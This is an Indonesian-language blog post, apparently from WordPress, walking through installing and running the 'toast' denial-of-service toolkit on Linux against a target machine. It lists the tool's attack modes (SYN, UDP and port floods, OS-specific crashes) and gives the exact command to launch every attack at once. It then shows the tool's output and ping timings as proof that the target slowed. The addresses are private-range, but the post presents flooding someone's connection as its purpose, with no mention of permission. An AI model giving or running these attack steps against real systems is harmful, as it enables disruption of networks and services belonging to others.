Dos Attack with toast under Linux



Sebuah aplikasi opensource yang berfungsi untuk menyerang sebuah jaringan atau lebih tepat menyerang IP yang dimiliki oleh sebuah komputer untuk membanjiri dan memperlambat koneksi komputer tersebut.

Adapun topologinya :

(Source IP) —- (toast) —- (Target IP/Computer)

Ket : adalah sebuah sumber pengirim yang nantinya akan menyerang komputer targer () dengan menggunakan Toast . Sebelum melakukan penyerangan, terlebih dahulu kita melakukan hal itu… itu ..tu..tu (pasti kalian semua sudah tau), ya… benar …SCAN. Karena kita mau tau informasi – informasi apa saja yang kita butuhkan (pokok nya gt lah….wkwkwkwk). Mungkin informasi tersebut dapat kita ketahui misal dengan menggunakan tool PING. Nah .. nanti akan ketahuan informasi si targer, misalnya jarak, waktu dan paketnya.

Nah…. itu tadi sedikit cuap – cuap dari saya,😀. Jika ada kritik dari informasi tsb atau ada yang ingin menambahkan, silahkan beri komentar di posting ini, thanks.

ok… kita lanjut lagi, kemana ? Ya…. Instalasi toast dunkkk…

Instalasi:
a. Download toast.0.2.tgz (bagi yang blm ada & jika menggunakan yang versi baru jg gpp)
b. Extract toast
wnx:/home/wnx# tar -xzvf toast.0.2.tgz

c. Masuk ke direktori toast
wnx:/home/wnx# cd toast
wnx:/home/wnx/toast# ls
ATTACK bin EXPLAIN README src toast.sh

d. Install Toast

e. Jalankan ping ke komputer target wnx@wnx:~$ ping 192.168.13.53
wnx:/home/isbat/wnx# ping 192.168.13.53
64 bytes from 192.168.13.53: icmp_seq=1 ttl=63 time=6.60 ms
64 bytes from 192.168.13.53: icmp_seq=2 ttl=63 time=0.580 ms

f. Dari terminal baru jalankan toast, berapa macam attack yang ada ? Lihat option berapa toast dan amati berapa macam DoS yang bisa dijalankan toast
misal :
wnx:/home/wnx/toast# ls
ATTACK bin EXPLAIN README src toast.sh
wnx:/home/wnx/toast#cat ATTACK
Attack listing
1 = Syn floods
2 = Udp floods
3 = Port floods
4 = Linux attacks
5 = BSD attacks
6 = Windows 95 attacks
7 = Windows 98/2000/NT attacks
8 = Automatic attack selection (Install queso, good with -s)
9 = All Attacks
wnx:/home/wnx/toast#

g. Jalankan toast dengan option –s 9,
wnx:/home/wnx/toast# ./toast.sh 192.168.13.99 192.168.13.53 -s 9

catt : Jika anda belum paham dengan sintak toast, bisa menggunakan informasi bantuan, seperti di bawah ini.
wnx:/home/wnx/toast# ./toast.sh -h
usage: ./toast.sh
Attack listing
1 = Syn floods
2 = Udp floods
3 = Port floods
4 = Linux attacks
5 = BSD attacks
6 = Windows 95 attacks
7 = Windows 98/2000/NT attacks
8 = Automatic attack selection (Install queso, good with -s)
9 = All Attacks

___________ __
\__ ___/________ _______/ |_
| | / _ \__ \ / ___/\ __\
| |( ) __ \_\___ \ | |
|____| \____(____ /____ > |__|
______ ______ \/ \/
| __ | |____ |
| | | | ___| |
| | | | | ____| By Gridmark
| |__| | _ | |____
|______||_| |______|

Attempting to find an remote open port…
Throwing everything we got at 192.168.13.99
Running 1234…
Running DoS-Linux…
Running ascend-foo…
Running beer…
Running biffit…

Selanjut amati hasil ping apakah ada perubahan
64 bytes from 192.168.13.99: icmp_seq=41 ttl=63 time=0.635 ms
64 bytes from 192.168.13.99: icmp_seq=43 ttl=63 time=25.7 ms ===> perubahan
64 bytes from 192.168.13.99: icmp_seq=44 ttl=63 time=25.8 ms ===> perubahan
64 bytes from 192.168.13.99: icmp_seq=45 ttl=63 time=0.618 ms ===> perubahan

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s